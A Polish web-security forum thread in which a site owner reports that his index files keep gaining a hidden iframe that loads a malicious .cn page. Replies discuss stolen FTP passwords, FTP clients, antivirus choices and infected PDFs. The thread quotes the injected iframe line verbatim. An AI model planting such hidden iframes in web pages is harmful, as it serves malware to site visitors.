Skocz do zawartości
jackal

Włąmanie na serwer. Ciągłe zmiany plików index

Przez jackal, w Bezpieczeństwo

Polecane posty

jackal    0

jackal
Napisano

Od 3 dni ktoś zmienia na moim serwerze wszystkie pliki index. dodaje do nich linijkę:

 

"<iframe src="http://bigtopleads.cn:8080/index.php" width=152 height=132 style="visibility: hidden"></iframe>"

adresy są różne ale zawsze *.cn

 

Jak mogę sobie z tym poradzić.

Jak znaleźć kto gdzie i jak to robi.

Wygląda to na jakiś automat który leci po wszystkich index na serwerze i je modyfikuje.

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

ulf    0

ulf
Napisano

Problem może się pojawić kiedy ktoś np. ukradnie komputer, na którym znajduje się plik z hasłami TC. Haseł tych po wykradzeniu pliku można później bez problemu użyć.

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Gość   

Gość
Napisano

albo w ogóle jak ktoś ukradnie dom : )

 

lalart ...proponuję aż takich jaj sobie nie robić...

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Gość Pokuć   

Gość Pokuć
Napisano

Norton Internet Security 2009 i kilka domen zarażonych. Rozumiem że to cholerstwo wchodzi coś jak Blaster czy Sasser - samoistnie na kompa i kradnie hasla ? Zmieniałem hasła, reinstal TC i dalej cholerstwo dokleja się. Zmiana na innego klienta FTP pomoże ?

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

varez    0

varez
Napisano

filezilla na domyslnych (nie konfigurowalem) jest tragiczna

nawet sama zmienila sobie linefeedy z windowsowych na unixowe, podziękuję :/

 

WinSCP jest spoko, tylko nie dla newbie.

ws_ftp jest najlepszy chyba, ale znowu platny.

więcej nie znam niestety.

totalcmd jest chyba dla lubiacych wirusy (czepiaja sie tego) i tych ktorzy ida na total łatwiznę (tj uzywaja ie, natywnego klienta gg, itd) :) [ej, jak juz Cie bierze zeby zlapac za klawiature i sie wyklocac - nie to jest moim celem :)]

 

 

@is_wm:

no bo jak sie umie kompa uzywac to nie kradna :)

ja mam dobre zabezpieczenia na sieci + dobry firewall, bez antywirusa (bo zamuła), i jeszcze nigdy nikt nic nie wykradl ani nie zlapalem wirusa (instaluje AV raz na rok i skanuje)

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Gość Pokuć   

Gość Pokuć
Napisano

Dlaczego ? Jeden z lepszych Antywirusów, ja nigdy się na nim nie zawiodłem. Avasty, Pandy i inne wpuszczały pełno śmiecia, ten poza tą chińszczyzną niczego nie wpuszcza - odpowiednia konfiguracja...

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Gość N3T5kY   

Gość N3T5kY
Napisano
Dlaczego ? Jeden z lepszych Antywirusów, ja nigdy się na nim nie zawiodłem. Avasty, Pandy i inne wpuszczały pełno śmiecia, ten poza tą chińszczyzną niczego nie wpuszcza - odpowiednia konfiguracja...

 

Każdy ma inne zdanie... jak dla mnie NIS potrafi tylko zamulić.

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Gość Pokuć   

Gość Pokuć
Napisano

To masz chyba niezbyt mocnego kompa. Na moim starym AMD Durniu 800 Mhz, 640 MB Ramu i GF MX400 64 MB (A wcześniej 32) to dopiero potrafił taki 2003, 2005 zamulać :( Na nowym działa dobrze, nie ma zamuleń. Zainstalowałem sobie tego FileZilla i zobaczymy czy po zmianie haseł dalej będzie je kradł. Da sie na kompie zblokować chińskie IP ?

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

varez    0

varez
Napisano

norton - 4 godziny go z viśty kasowalem.. ciezko powiedzieć czy wina viśty, czy nortona, znajac zycie obu ;] skonczylo sie na tym ze nie dzialaly mu wszystkie moduly, ale wywalic tego cholerstwa nie dalo rady (u siebie bym dal rady, to byl laptop bez moich magicznych programow, internetu i czegokolwiek).. do kosza z tym!

 

panda sie do czegos nadaje, trzeba ja umiec ustawic,

kaspersky - chyba najlepszy (tylko ten prosiak wyjacy - jest to jeszcze w nowych?)

mks, ten od eset itp to badziewie na kolkach co pusci co drugiego wirusa

od bidy ujdzie avast - za free, i czasem cos tam robi ;]

 

firewall to podstawa, no i myślenie :(

 

a w temacie - to mnie osobiscie wkurza, ze co drugie forum i co trzecia strona probuje mi wcisnac ten syf :/

btw: wiecie ze jakas odmiana tego wirusa (bo byl jeden, teraz jest mnostwo - ktos podlapal temat) jest prawdopodobnie dzielem polaków? zainfekowany pdf ktory sie pakuje na dysk to tak naprawde regulamin studiow Politechniki Rzeszowskiej :) nie zebym byl z nich dumny, i btw: nie jestem studentem poli:)

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Gość Pokuć   

Gość Pokuć
Napisano

No mi też coś tam adobe reader wołał ale pojawiło się okienko jak przy otwieraniu i tyle...

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

varez    0

varez
Napisano
No mi też coś tam adobe reader wołał ale pojawiło się okienko jak przy otwieraniu i tyle...

 

No bo to (zawirusowany dokument) sie otwiera w niewidzialnej, bądz 1x1 pixel ramce. wiec pojawi sie okienko i poza tym nic nie widac. jak juz doszedles do tego etapu (widziales okienko) a AV nic nie wykrył to juz raczej masz niespodzianke na dysku.

 

ja teraz u znajomych ktorym robie komputery wylaczam plugin acrobata, jak beda faktycznie chcieli dokument to sobie otworza sami :)

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się
Przejdź do listy tematów Bezpieczeństwo
×